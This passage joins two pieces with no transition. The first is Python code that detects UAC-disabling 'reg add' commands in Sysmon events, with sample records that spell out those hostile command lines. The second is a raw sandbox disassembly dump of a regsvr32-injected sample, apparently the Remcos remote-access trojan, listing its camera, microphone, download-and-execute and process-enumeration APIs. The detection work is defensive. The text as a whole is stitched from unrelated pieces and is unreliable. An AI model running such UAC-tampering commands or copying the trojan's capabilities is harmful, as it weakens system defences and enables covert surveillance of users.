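        if basename(tok) not in ("reg", "reg.exe"):
            continue
        if i + 2 >= len(tokens) or tokens[i + 1].lower() != "add":
            continue
        key = tokens[i + 2].rstrip("\\").lower()
        hive = key.split("\\", 1)[0]
        if hive not in HKLM_HIVES or not key.endswith(POLICY_KEY_SUFFIX):
            continue
        rest = tokens[i + 3:]
        value, data = _switch_value(rest, "/v"), _switch_value(rest, "/d")
        if value and value.lower() in UAC_POLICY_VALUES and data == "0":
            return {"key": tokens[i + 2], "value": value, "data": data}
    return None


def triage_process_events(events):
    """Apply the check to process-creation records; one finding per hit."""
    findings = []
    for ev in events:
        hit = detect_uac_tamper(ev["CommandLine"])
        if hit:
            findings.append({"pid": ev["ProcessId"], "image": basename(ev["Image"]),
                             "parent": basename(ev["ParentImage"]), **hit})
    return findings


# Constructed records (Sysmon Event ID 1 field names). Event 4120 carries the
# command line from the report; the parent regsvr32.exe is assumed, PIDs invented.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f'},
    {"ProcessId": 5004, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe ADD HKCU\Software\ExampleApp /v EnableLUA /t REG_DWORD /d 0 /f"},
]

if __name__ == "__main__":
    for f in triage_process_events(SAMPLE_EVENTS):
        print(f)
```

Event 5004 (re-enabling UAC with /d 1) and event 5120 (a same-named value under HKCU, where it has no effect) are deliberately not flagged. A command-line check is only half the coverage: the same write made through PowerShell or the registry API never passes through reg.exe, so pair it with a registry-set event (Sysmon Event ID 13) on the Policies\System key.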
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02A432EB,00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002), ref: 02A4335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02A4336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,02A432EB,00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002), ref: 02A43390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: ef0b5bb356482f9ff1651a67fcc0a9a24649909dbb7b898b1964923f31258503
                                      • Instruction ID: 3722c52e21781b97aa05079da6a819ecd73092739da5d009a7e1d7c1c06bf15f
                                      • Opcode Fuzzy Hash: ef0b5bb356482f9ff1651a67fcc0a9a24649909dbb7b898b1964923f31258503
                                      • Instruction Fuzzy Hash: 2AF08C34A40229FBDF119FA0D848BAFBBB5EF44716F1045E8F80AA6250CF70DA51CA90
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,02A74EF8,02A04E7A,00000001,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05120
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A0512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05137
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000), ref: 02A05140
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      • API String ID: 2993684571-305739064
                                      • Opcode ID: cd95f3787fda87c5c617d8ee591431992c595f013363cbfd3d551945abd29ed4
                                      • Instruction ID: 1f7ed195c115099623e5d8e77035857dbc503184ab7f35a3ce8f148400edbdc8
                                      • Opcode Fuzzy Hash: cd95f3787fda87c5c617d8ee591431992c595f013363cbfd3d551945abd29ed4
                                      • Instruction Fuzzy Hash: 3AF09071D84311BFEB203B749D4EA7FBF99BB02710F004959E88282690DE658C15CF92
                                      APIs
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 02A1ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 02A1AE00
                                      • Sleep.KERNEL32(00002710), ref: 02A1AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 02A1AE10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: 68ed11aebca30b6ccb1047753fb990c1c1812972157f87d63bbac4d6edfdd05a
                                      • Instruction ID: 899a1972d91dde81636bfbbf6b2edd50238f6807e91a878c3b84d42a8840063d
                                      • Opcode Fuzzy Hash: 68ed11aebca30b6ccb1047753fb990c1c1812972157f87d63bbac4d6edfdd05a
                                      • Instruction Fuzzy Hash: BCE01226EC0261776620377A6D4FD7F7E29DAD2B607010469F9065A144DE440C16CAF2
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,02A1CDED), ref: 02A1CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,02A1CDED), ref: 02A1CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,02A1CDED), ref: 02A1CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,02A1CDED), ref: 02A1CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 02A1CD82
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      • API String ID: 3024135584-2418719853
                                      • Opcode ID: a8874afee890df0ae664a1f5e03282a0b7d4df01981258976cbab406ce48099c
                                      • Instruction ID: 7998b48ad31a927aa11b039c908a0d9cb8ea575f309337bd212c1df23a2c9ee4
                                      • Opcode Fuzzy Hash: a8874afee890df0ae664a1f5e03282a0b7d4df01981258976cbab406ce48099c
                                      • Instruction Fuzzy Hash: 86E09232980325E7E21027B5AC4DCAB7B6CF748722B000645FA1284082AE24841586F0
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02A1B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4CD
                                      • LockResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,02A0F3DE,00000000), ref: 02A1B4E3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: af4359f8f59fe47e7d20c8fe2001293a85122292dab2f1a839757f72489d8172
                                      • Instruction ID: 9e8907421cf539f6f95abfc5013afe87a6c38e81361b664f7df3e58f87e43a36
                                      • Opcode Fuzzy Hash: af4359f8f59fe47e7d20c8fe2001293a85122292dab2f1a839757f72489d8172
                                      • Instruction Fuzzy Hash: 6DE01235A80331FBDB211B65AC4CD473F29F7C57667000855F9019A211CF39C42ADAA4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 475da59341925d819c5c24b76dfb580e4e13fad828995188aafbbf143d6661ff
                                      • Instruction ID: 58e0d13c08ae7b9ee7545343f5b9a5487ab435bc85be1282f48435559b555946
                                      • Opcode Fuzzy Hash: 475da59341925d819c5c24b76dfb580e4e13fad828995188aafbbf143d6661ff
                                      • Instruction Fuzzy Hash: BE718171A00216DBCB21CF55C884AFFBBB5EF85364F544669E42AA7180DF70D9C1CBA2
                                      APIs
                                      • Sleep.KERNEL32(00000000,?), ref: 02A044C4
                                        • Part of subcall function 02A04607: __EH_prolog.LIBCMT ref: 02A0460C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      • API String ID: 3469354165-3547787478
                                      • Opcode ID: b9c3250047742795fd195e857c9c3a7cfdfff1e94548410fa7e2c5bda0cf64c5
                                      • Instruction ID: 40cd6170d49b8e12d66c16f401a5df2888267d3ee2a6b1093361d06ef278a6a8
                                      • Opcode Fuzzy Hash: b9c3250047742795fd195e857c9c3a7cfdfff1e94548410fa7e2c5bda0cf64c5
                                      • Instruction Fuzzy Hash: 7451F331B843106BDA14FB74BED8B6E3B67AB89750F400819E90A876D0DF319D19CF96
                                      APIs
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • _free.LIBCMT ref: 02A44E06
                                      • _free.LIBCMT ref: 02A44E1D
                                      • _free.LIBCMT ref: 02A44E3C
                                      • _free.LIBCMT ref: 02A44E57
                                      • _free.LIBCMT ref: 02A44E6E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 903d19b1dc00355d37ce84b6aff4af6af35e2299aa16f5cda84cae4b7cd6e85f
                                      • Instruction ID: 295ebc42998bc0f22fca48a64d0c043aef793d9de47156a8534b853e533933ec
                                      • Opcode Fuzzy Hash: 903d19b1dc00355d37ce84b6aff4af6af35e2299aa16f5cda84cae4b7cd6e85f
                                      • Instruction Fuzzy Hash: 9951D271A40704AFDB21DF69C881BAB77F5EF89724B044659E819D7250EF31EA01CF80
                                      APIs
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A0F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 02A0F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 02A0FB05
                                        • Part of subcall function 02A1BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,02A0F5F9,00000000,?,?,02A75338), ref: 02A1BFFA
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0FAF6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 4269425633-0
                                      • Opcode ID: c86336354261a35b83734b1d131ec0fab75fb29f629aa089c5b6e3c330cff6b3
                                      • Instruction ID: 5367318e0c06a64e0f5d19521a7599a6d60e427ccd53f259065bf9a8f4b7aa1e
                                      • Opcode Fuzzy Hash: c86336354261a35b83734b1d131ec0fab75fb29f629aa089c5b6e3c330cff6b3
                                      • Instruction Fuzzy Hash: 684114315483419BC325FB21E9D4AEFB3AAAF94354F504D1EE58E861D0EF305A0ACF52
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 7155d6843e2ed9cb6e5b81a8112529adfb5fbab7af049e474d456e7df7bc53ab
                                      • Instruction ID: 14d49470f456576d5be844d2895b577273aa92a163d1a09d540906b024b693a0
                                      • Opcode Fuzzy Hash: 7155d6843e2ed9cb6e5b81a8112529adfb5fbab7af049e474d456e7df7bc53ab
                                      • Instruction Fuzzy Hash: 01419E36A41200AFDB24DF78C981A5EB7F6EFC9714F2545A9E516EB241DF31E902CB80
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,02A3F8C8,?,00000000,?,00000001,?,?,00000001,02A3F8C8,?), ref: 02A51179
                                      • __alloca_probe_16.LIBCMT ref: 02A511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A51202
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02A3AE84,?), ref: 02A51214
                                      • __freea.LIBCMT ref: 02A5121D
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID:
                                      • API String ID: 313313983-0
                                      • Opcode ID: 8c9be06d476d7a59310e52805242d50cc7a76a366117209c2c2bfe39f9d4e5a4
                                      • Instruction ID: 6ee0961616e0d56674ba05df5795ed2b0c8b32cba522393b0872425d05193a63
                                      • Opcode Fuzzy Hash: 8c9be06d476d7a59310e52805242d50cc7a76a366117209c2c2bfe39f9d4e5a4
                                      • Instruction Fuzzy Hash: 4131B371A4022A9BDF25DF64DC80EBFBBA5EB40714F044568FC08DB190EB35C955CB90
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02A01BF9
                                      • waveInOpen.WINMM(02A72AC0,000000FF,02A72AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02A01C8F
                                      • waveInPrepareHeader.WINMM(02A72A88,00000020), ref: 02A01CE3
                                      • waveInAddBuffer.WINMM(02A72A88,00000020), ref: 02A01CF2
                                      • waveInStart.WINMM ref: 02A01CFE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID:
                                      • API String ID: 1356121797-0
                                      • Opcode ID: bf02913a7fd28fead01e46f0874666c08cea984e7266b361c2322497222cf81e
                                      • Instruction ID: baa8dd0acf3fc8e3e2d8723f4accfde165049fcd5ba495f09488dfbca1d45265
                                      • Opcode Fuzzy Hash: bf02913a7fd28fead01e46f0874666c08cea984e7266b361c2322497222cf81e
                                      • Instruction Fuzzy Hash: 67215A72EC42019FF7259F65FC04B5B7BB6FB94710B00082AA90AC6690DF34846ACB5C
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 02A4F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A4F386
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02A4F3AC
                                      • _free.LIBCMT ref: 02A4F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02A4F3CE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 1df56cd4992bead125fa5d6cce24ace7a967296636bb250138403dd346d65b20
                                      • Instruction ID: 7dcc863570725be2e42309c370157bb35e341faaedb0fca54fa59364cc41dcdc
                                      • Opcode Fuzzy Hash: 1df56cd4992bead125fa5d6cce24ace7a967296636bb250138403dd346d65b20
                                      • Instruction Fuzzy Hash: E101D473A01365BF27211ABA5C8CC7B6A6DDAC6EAD31511ADFD24C7600DF68DD0285F0
                                      APIs
                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,02A1C510,00000000,00000000,00000000), ref: 02A1C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C44D
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,02A06F85,00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C46A
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,02A1C510,00000000,00000000), ref: 02A1C477
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: 15c1627b26ddfb032e5d188203a53fe8f313d1b645d3138f43eb120c5ed380ae
                                      • Instruction ID: 0959e3061482bb99ced8495fc932048be66c8d43598c5cb25966bdae3b9a8abd
                                      • Opcode Fuzzy Hash: 15c1627b26ddfb032e5d188203a53fe8f313d1b645d3138f43eb120c5ed380ae
                                      • Instruction Fuzzy Hash: B711A971288225BFE6144B64AC8EE7B739DEB46774F00462AF592C71C0DF219C058672
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A11170
                                      • int.LIBCPMT ref: 02A11183
                                        • Part of subcall function 02A0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02A0E0D2
                                        • Part of subcall function 02A0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02A0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02A111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02A111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A111EA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID:
                                      • API String ID: 2536120697-0
                                      • Opcode ID: a4725d8a338da820dce356096dc07ecd92d017ef0bfe99d914571afcbc58732f
                                      • Instruction ID: 4486c0cdfde61c332b3fd2cf7e3240a4a923f04221799b2a76a5322f451383a0
                                      • Opcode Fuzzy Hash: a4725d8a338da820dce356096dc07ecd92d017ef0bfe99d914571afcbc58732f
                                      • Instruction Fuzzy Hash: BB11E732A40118ABCB15BBA8EA4499EFBBEDF40760B10055AE905A7290EF309E45CFD0
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02A4829E
                                      • _free.LIBCMT ref: 02A482D3
                                      • _free.LIBCMT ref: 02A482FA
                                      • SetLastError.KERNEL32(00000000), ref: 02A48307
                                      • SetLastError.KERNEL32(00000000), ref: 02A48310
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: ea3f19ab7d1b3763d9d7c5283b1f2eb2d40483173db919813752dc001e7f772b
                                      • Instruction ID: 63d484f621e65b03d057e260e6fbe9daf2c4413e2ce810f70cb3054fa648a190
                                      • Opcode Fuzzy Hash: ea3f19ab7d1b3763d9d7c5283b1f2eb2d40483173db919813752dc001e7f772b
                                      • Instruction Fuzzy Hash: 3801F936980700AF831126257DC4E6B266FEBC27757240929FC2996184EF6CCC0685A4
                                      APIs
                                      • _free.LIBCMT ref: 02A509D4
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A509E6
                                      • _free.LIBCMT ref: 02A509F8
                                      • _free.LIBCMT ref: 02A50A0A
                                      • _free.LIBCMT ref: 02A50A1C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 27fa79e8ca64a88a31b3a0c63e2d059a0e1b3b962df6610202e298bd8ca6daef
                                      • Instruction ID: e9c4e39460b7412b3223ec9aaacc3b84d31d818b35638bc6f1d9ebb4c32ce526
                                      • Opcode Fuzzy Hash: 27fa79e8ca64a88a31b3a0c63e2d059a0e1b3b962df6610202e298bd8ca6daef
                                      • Instruction Fuzzy Hash: C5F01232984210FB8620EF58E9C1C1B73DEEA55B167588D0DF56DDB500DF30FC958A94
                                      APIs
                                      • _free.LIBCMT ref: 02A44066
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A44078
                                      • _free.LIBCMT ref: 02A4408B
                                      • _free.LIBCMT ref: 02A4409C
                                      • _free.LIBCMT ref: 02A440AD
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: eb1561ad6dbf531a4dec8638e88ccc642e26c6a3cdfb091250d77092f4a5ebc4
                                      • Instruction ID: 503d93d99fbfd541eaf496d7923be7106836a90987eaf91c068cf77907ed160b
                                      • Opcode Fuzzy Hash: eb1561ad6dbf531a4dec8638e88ccc642e26c6a3cdfb091250d77092f4a5ebc4
                                      • Instruction Fuzzy Hash: CDF0D071C81110DFA621AF28BC80A0677A6E745B613494916F92456660CF35CE7BCFCA
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02A06FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02A070A0
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$open
                                      • API String ID: 2825088817-258962619
                                      • Opcode ID: 15c41326b4009cc4bf496649b0f96d2f43134bdc5b2854712ef093639a0823ab
                                      • Instruction ID: cc6a99faef55bdbaabd559ce363c431d8efa40e1bbc410af57c3b930a89e0d14
                                      • Opcode Fuzzy Hash: 15c41326b4009cc4bf496649b0f96d2f43134bdc5b2854712ef093639a0823ab
                                      • Instruction Fuzzy Hash: F261E271B8430066DA24FF74AEE5DBE73ABAF80B50F80090EE546571C0EF749909CE92
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02A13ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02A13AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02A13B8B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      • Opcode ID: 64ff003d21016030bf83ca0e7d33fc4afcfde995926193ff8372ee72b9cbc4b4
